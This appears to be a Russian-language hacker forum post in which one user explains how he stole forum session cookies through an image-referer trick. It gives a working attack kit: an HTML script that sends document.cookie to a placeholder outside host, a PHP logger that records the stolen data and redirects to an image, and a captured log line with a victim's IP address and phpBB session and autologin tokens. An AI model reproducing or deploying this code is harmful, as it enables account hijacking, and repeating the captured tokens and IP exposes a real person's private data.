ого. интересный рефер... рассказывай, как отснифил?

просто свой скрипт написал на основе античатовского
код в картинке
<html>
<head>
<script>img = new Image(); img.src = "http://xxxx/1.php?lol"+document.cookie;
</script>
</head>
<body>
<img src="http:/xxxx/vl.jpg"><br>
</body>
</html>


Цитата:
<?php
$logfile="logi.txt"; #путь к лог-файлу
$mlength=50; #максимальное число записей в лог-файле

#читаем CGI запрос
$input = '';
foreach($HTTP_GET_VARS as $var => $val)
$input .= $var.'='.$val.' ';


#получаем время запроса и HTTP_REFERER
$now = time();
if (isset($HTTP_REFERER)) $ref = $_SERVER['HTTP_REFERER']; else $ref = 'No referrer!';

#читаем лог-файл в массив
$f = array();
$fh = @FOpen($logfile,'r');
if ($fh != false) {
while(!FEoF($fh))
$f[] = FGetS($fh);
FClose($fh);
}

#открываем на запись лог
$fh = FOPen($logfile,'w');

#сохраняем данные запроса
FPutS($fh,'['.$now.'] IP='.$REMOTE_ADDR.' REFERER='.$ref.' QUERY='.$input."
");

#сохраняем остальные логи, так что бы длина лог-файла не превышала mlength
$counter=0;
foreach ($f as $str) {
$counter++;
if ($counter < $mlength)
FPutS($fh,$str);
else
break;
};

#закрываем лог
Fclose ($fh);

#делаем редирект на картинку
header("Location: http://xxxxxx");

?>

после получения вашик Cookies а именно
Цитата:
[1119518613] IP=195.209.67.79 REFERER=http://xxxxxx.ru/images/avatars/150670992342b937671260b.jpg QUERY=xxxxxphpbb2mysql_data=a:2:{s\"autologinid\"; s\"5eb6c57b9b11a8c22ff02fa965bd9528\";s:6:\"userid \";i:3;}; phpbb2mysql_sid=816eeef16b5695e96aa113e3a6e964de; phpbb2mysql_t=a:3:{i:3958;i:1119518475;i:3856;i:11 19518507;i:3922;i:1119518518;}